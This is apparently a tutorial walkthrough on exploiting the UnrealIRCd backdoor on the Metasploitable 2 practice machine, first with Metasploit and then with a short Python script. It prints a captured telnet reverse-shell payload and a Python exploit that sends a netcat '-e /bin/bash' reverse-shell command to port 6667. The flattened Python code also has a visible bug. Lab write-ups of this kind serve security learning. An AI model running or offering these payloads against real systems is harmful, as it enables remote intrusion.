Metasploitable 2 - IRC Backdoor
The first tutorial on Metasploitable 2 was about the vsftp backdoor, in this post we will talk about the IRC Backdoor.
In the first part of this “How to” we will run the Metasploit exploit ( The skid way ).
The second part we will write our own python exploit to trigger the backdoor
#The Metasploit way
The first thing we need to do is a scan of the machine to see the open port (nmap example)
We know that irc is on the 6667, let’s use the -sV argument to see the version of the server
The version here is Unreal ircd, let’s run msfconsole and search for the exploit
We just need to set the RHOST and to use this exploit
Now we just need to run “exploit -j” and wait to attach to the session
You’re done you have succefully exploited the metasploit 2 Machine !
Understanding the exploit
The first part was really easy but let’s read the code to understand how it works
Let’s focus on this part
Even if you don’t understand ruby you can understand how the exploit work
Metasploit will connect to the host and send
AB; the payload\n
This will trigger the backdoor and run whatever the payload is
Sniffing with wireshark
Let’s try to run the exploit and sniff the network with wireshark
As you can see we have the
Let’s select the 2nd packet and go deeper
Here we see the complete payload
sh -c '(sleep 3862|telnet ip port| while : ; do sh && break; done 2>&1|telnet ip port > /dev/null 2>&1 &)'
This payload is a reverse shell
Now that we know how the exploit works it’s time to write our own implementation with python
#IRC Unreal Python
The Python script will just send the backdoor command to the irc server, we will use a netcat listener to get a reverse shell
#!/usr/bin/python import socket import argparse parser = argparse.ArgumentParser(description='Python implementation of the Unreal IRC backdoor') parser.add_argument('-i', '--host',help="Ip of the victim") parser.add_argument('-p','--port' ,help="Port of the netcat listener") arg =parser.parse_args() socket.socket(socket.AF_INET,socket.SOCK_STREAM) socket.connect((arg.host,6667)) # Connect to the irc server socket.recv(2048) # Receive the response of the server socket.send("AB; sh -c '(nc yourip" + " " + arg.port + " -e /bin/bash) '\n") socket.close()
run the script
./unreal_irc.py -i 172.28.128.3 -p 1337
And here you go